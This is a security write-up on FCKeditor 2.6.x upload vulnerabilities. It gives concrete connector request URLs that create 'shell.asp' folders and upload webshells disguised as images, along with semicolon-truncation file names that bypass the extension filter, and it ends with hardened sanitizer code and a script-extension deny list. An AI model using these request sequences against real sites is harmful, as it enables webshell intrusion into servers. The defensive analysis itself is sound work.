Contents
1. Vulnerability description
2. Trigger conditions
3. Affected versions
4. Code analysis
5. Defenses
6. Thoughts on attack and defense
1. Vulnerability description
FCKeditor is one of the best WYSIWYG web editors available; it is written in JavaScript. It is powerful, easy to configure, cross-browser, supports many server-side programming languages and is open source. It is very popular, technical documentation is easy to find on the internet, and many Chinese web projects and large sites use FCKeditor.
It can be combined with PHP, JavaScript, ASP, ASP.NET, ColdFusion, Java, ABAP and other programming languages.
One important FCKeditor feature, file upload, is frequently used by attackers to obtain a shell. The root causes are weak role/permission control and bypassable logic in the file-extension restriction.
Relevant Link:
http://sebug.net/vuldb/ssvid-20830
2. Trigger conditions
0x1: Information gathering
First collect the FCKeditor version information
http://localhost/fckeditor/editor/dialog/fck_about.html /* version 2.6.8 Build 25427 */
0x2: Locating the upload endpoint
Disclosing the physical path:
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
1. Path disclosure
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
2. The directory-listing issue also helps locate the upload path
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3. Other upload pages
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
Many sites have already deleted the _samples directory, but it is worth a try.
FCKeditor/editor/fckeditor.html cannot upload files directly, but clicking the upload-image button and then "Browse Server" jumps to a page that can upload files
http://192.168.174.138/fckeditor/editor/fckeditor.html
4. Commonly used upload paths
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
5. Upload paths of the test files shipped with FCKeditor
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html
The upload endpoints finally obtained are:
http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html
0x3: Creating a new folder
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 // creates a folder under the images folder
0x4: IIS parsing vulnerability
If a file sits inside a folder named xx.asp, every file in that folder is executed as an .asp script; this abuses the IIS xx.asp folder parsing vulnerability.
1. Create a folder /z/shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
2. Upload an xx.jpg file whose content is a webshell
http://localhost/userfiles/image/shell.asp/z/choop.jpg // this xx.jpg is parsed as a webshell
0x5: Bypassing FCKeditor's extension filter through the parsing vulnerability
Normally FCKeditor does have defensive logic for the extension of uploaded files (script files are not allowed to be uploaded).
1. Uploading a file named shell.php;.jpg: the file is renamed to shell_php.jpg
2. Uploading a file named 1) a.php;a_jpg or 2) a.asp;a_jpg: the file is not renamed
3. Because IIS has a parsing vulnerability in which the string after the semicolon ";" is truncated, to IIS the uploaded file is a.php or a.asp, and so it gets executed
Relevant Link:
http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597
3. Affected versions
2.6.xx
4. Code analysis
FCKeditor's upload check uses a blacklist/whitelist to decide which file types may or may not be uploaded; the concrete logic lives in
1. asp: \editor\filemanager\connectors\asp\io.asp
2. php: \editor\filemanager\connectors\php\io.php // the browser directory contains a second copy of the same directory structure
3. asp: \editor\filemanager\browser\default\connectors\asp\io.asp
4. php: \editor\filemanager\browser\default\connectors\php\io.php
0x1: ASP
\fckeditor\editor\filemanager\connectors\asp\class_upload.asp
Private Function IsAllowed(sExt)
    Dim oRE
    Set oRE = New RegExp
    oRE.IgnoreCase = True
    oRE.Global = True
    If sDenied = "" Then
        oRE.Pattern = sAllowed
        IsAllowed = (sAllowed = "") Or oRE.Test(sExt)
    Else
        oRE.Pattern = sDenied
        IsAllowed = Not oRE.Test(sExt)
    End If
    Set oRE = Nothing
End Function
\fckeditor\editor\filemanager\connectors\asp\io.asp
Function IsAllowedExt( extension, resourceType )
    Dim oRE
    Set oRE = New RegExp
    oRE.IgnoreCase = True
    oRE.Global = True

    Dim sAllowed, sDenied
    sAllowed = ConfigAllowedExtensions.Item( resourceType )
    sDenied = ConfigDeniedExtensions.Item( resourceType )

    IsAllowedExt = True

    If sDenied <> "" Then
        oRE.Pattern = sDenied
        IsAllowedExt = Not oRE.Test( extension )
    End If

    If IsAllowedExt And sAllowed <> "" Then
        oRE.Pattern = sAllowed
        IsAllowedExt = oRE.Test( extension )
    End If

    Set oRE = Nothing
End Function
The extension to be checked is compared against the lists in FCKeditor's configuration file, config.asp
\fckeditor\editor\filemanager\connectors\asp\config.asp
ConfigAllowedExtensions.Add "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"
ConfigAllowedExtensions.Add "Image", "bmp|gif|jpeg|jpg|png"
ConfigAllowedExtensions.Add "Flash", "swf|flv"
ConfigAllowedExtensions.Add "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"
This only supplies the patterns for FCKeditor's regex check; the real renaming mechanism is here
\fckeditor\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Set oRegex = New RegExp
    oRegex.Global = True

    if ( ConfigForceSingleExtension = True ) then
        ' This is the key renaming logic. The pattern matches every "." that is
        ' still followed by another "." later in the name (the negative lookahead
        ' on [^.]*$ fails only for the last dot), and each such "." is replaced
        ' with "_", so only the last dot survives.
        ' 1. A file name such as asp.asp;asp.jpg is caught: its first "." becomes "_"
        ' 2. A file name such as asp.asp;jpg contains a single ".", so nothing is
        '    replaced, and it also passes the extension check, i.e. a bypass
        oRegex.Pattern = "\.(?![^.]*$)"
        sNewFileName = oRegex.Replace( sNewFileName, "_" )
    end if

    ' remove \ / | : ? * " < > and control characters
    oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function
5. Defenses
1. ASP
0x1: Delete the html files containing "test" under the fckeditor directory
1. \editor\filemanager\connectors\test.html
0x2: Defend against the IIS parsing vulnerability (semicolon truncation) at the code level
\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex = New RegExp
    Set oRegexSecurityExt = New RegExp
    oRegex.Global = True
    oRegexSecurityExt.Global = True
    ' match ".ASP;" as well as ".asp;" (the PHP version below uses the /i modifier)
    oRegexSecurityExt.IgnoreCase = True

    ' each step writes back to sNewFileName so that the next step sees its result
    if ( ConfigForceSingleExtension = True ) then
        ' keep only the last "."
        oRegex.Pattern = "\.(?![^.]*$)"
        sNewFileName = oRegex.Replace( sNewFileName, "_" )
        ' strip a script extension that sits directly before ";" or at the end of the name
        oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
        sNewFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
    end if

    ' remove \ / | : ; ? * " < > and control characters (";" added so IIS has nothing to truncate at)
    oRegex.Pattern = "(\\|\/|\||:|\;|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
    Set oRegexSecurityExt = Nothing
end function
0x3: Defend against the IIS parsing vulnerability (creation of an xx.asp directory) at the code level
If an attacker creates an xx.asp directory through FCKeditor's folder-creation interface, IIS parses any file in that directory as an ASP script, so the attacker can upload a jpg file containing a webshell into it.
' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex = New RegExp
    Set oRegexSecurityExt = New RegExp
    oRegex.Global = True
    oRegexSecurityExt.Global = True
    oRegexSecurityExt.IgnoreCase = True

    ' remove . \ / | : ; ? * " < > and control characters ("." added: a folder name never needs an extension)
    oRegex.Pattern = "(\.|\\|\/|\||:|\?|\;|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    sNewFolderName = oRegex.Replace( sNewFolderName, "_" )

    ' forbid the dangerous extensions (defence in depth: every "." is already gone at this point)
    oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
    SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

    Set oRegex = Nothing
    Set oRegexSecurityExt = Nothing
end function
0x4: Regex bypass of the extension upload restriction
Same as 0x2 (defending against semicolon truncation at the code level); in addition the regex can be hardened by adding start and end anchors around the extension, so that an attacker's malformed extension cannot bypass the check
Function IsAllowedType( resourceType )
    Dim oRE
    Set oRE = New RegExp
    oRE.IgnoreCase = False
    oRE.Global = True
    oRE.Pattern = "^(" & ConfigAllowedTypes & ")$"
    IsAllowedType = oRE.Test( resourceType )
    Set oRE = Nothing
End Function

Function IsAllowedCommand( sCommand )
    Dim oRE
    Set oRE = New RegExp
    oRE.IgnoreCase = True
    oRE.Global = True
    oRE.Pattern = "^(" & ConfigAllowedCommands & ")$"
    IsAllowedCommand = oRE.Test( sCommand )
    Set oRE = Nothing
End Function
Relevant Link:
http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807
2. PHP
With IIS + FastCGI, both an ASP and a PHP runtime environment exist at the same time
/editor/filemanager/connectors/php/io.php
// Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
	$sNewFolderName = stripslashes( $sNewFolderName ) ;
	// Remove . \ / | : ; ? * " < > and control characters
	$sNewFolderName = preg_replace( '/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;
	// Defence in depth: every "." is already gone, so this can no longer match
	$sNewFolderName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;
	return $sNewFolderName ;
}

// Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
	global $Config ;
	$sNewFileName = stripslashes( $sNewFileName ) ;
	// Replace dots in the name with underscores (only one dot can be there... security issue).
	if ( $Config['ForceSingleExtension'] )
		$sNewFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sNewFileName ) ;
	// Strip a script extension sitting directly before ";" or at the end of the name.
	// This must run before ";" is removed, otherwise the (;|$) alternative never matches.
	$sNewFileName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;
	// Remove \ / | : ; ? * " < > and control characters
	$sNewFileName = preg_replace( '/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;
	return $sNewFileName ;
}
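The checks from section 4 and the hardened sanitizers from section 5 (0x2, 0x3, 0x4 and the PHP variant), as an added example that is not FCKeditor's own code: a JavaScript port of the connector's unanchored whitelist test beside its anchored form, and of the hardened SanitizeFileName / SanitizeFolderName, run against the file and folder names this page discusses. VBScript's RegExp object uses the JScript engine, so the page's patterns are reused verbatim; the case-insensitive flag on the dangerous-extension pattern is an assumption taken from the PHP version.

```javascript
// Added example, not FCKeditor code: a port of the extension check and the hardened sanitizers.
const ALLOWED_IMAGE = "bmp|gif|jpeg|jpg|png"; // ConfigAllowedExtensions "Image" from config.asp
const DANGEROUS = "asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm";

// The extension exactly as the connector derives it: everything after the last dot.
function extensionOf(fileName) {
  const i = fileName.lastIndexOf(".");
  return i < 0 ? "" : fileName.slice(i + 1);
}

// Original, unanchored whitelist test (IsAllowedExt): "asp;a_jpg" passes because
// "jpg" occurs somewhere inside it.
function isAllowedExtUnanchored(ext) {
  return new RegExp(ALLOWED_IMAGE, "i").test(ext);
}

// Hardened test with ^...$ delimiters (defense 0x4): the whole extension must match.
function isAllowedExtAnchored(ext) {
  return new RegExp("^(" + ALLOWED_IMAGE + ")$", "i").test(ext);
}

// Hardened SanitizeFileName (defense 0x2); every step feeds the next one.
function sanitizeFileName(name, forceSingleExtension = true) {
  let s = name;
  if (forceSingleExtension) {
    s = s.replace(/\.(?![^.]*$)/g, "_"); // every dot except the last becomes "_"
    // ".asp;" or a trailing ".asp" collapses to "_" ("i" flag assumed, as in the PHP port)
    s = s.replace(new RegExp("\\.(" + DANGEROUS + ")(;|$)", "gi"), "_");
  }
  // remove \ / | : ; ? * " < > and control characters (";" added against IIS truncation)
  s = s.replace(/(\\|\/|\||:|;|\?|\*|"|<|>|[\u0000-\u001F]|\u007F)/g, "_");
  return s;
}

// Hardened SanitizeFolderName (defense 0x3): dots are stripped outright, so a
// folder can never be named "shell.asp" and trigger IIS's xx.asp parsing.
function sanitizeFolderName(name) {
  let s = name.replace(/(\.|\\|\/|\||:|\?|;|\*|"|<|>|[\u0000-\u001F]|\u007F)/g, "_");
  s = s.replace(new RegExp("\\.(" + DANGEROUS + ")$", "i"), "_"); // defence in depth
  return s;
}

module.exports = { extensionOf, isAllowedExtUnanchored, isAllowedExtAnchored, sanitizeFileName, sanitizeFolderName };
```

Running `sanitizeFileName("a.asp;a_jpg")` yields `a_a_jpg`, so the name IIS would have truncated to `a.asp` no longer carries a script extension at all.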
6. Thoughts on attack and defense
Copyright (c) 2014 LittleHann All rights reserved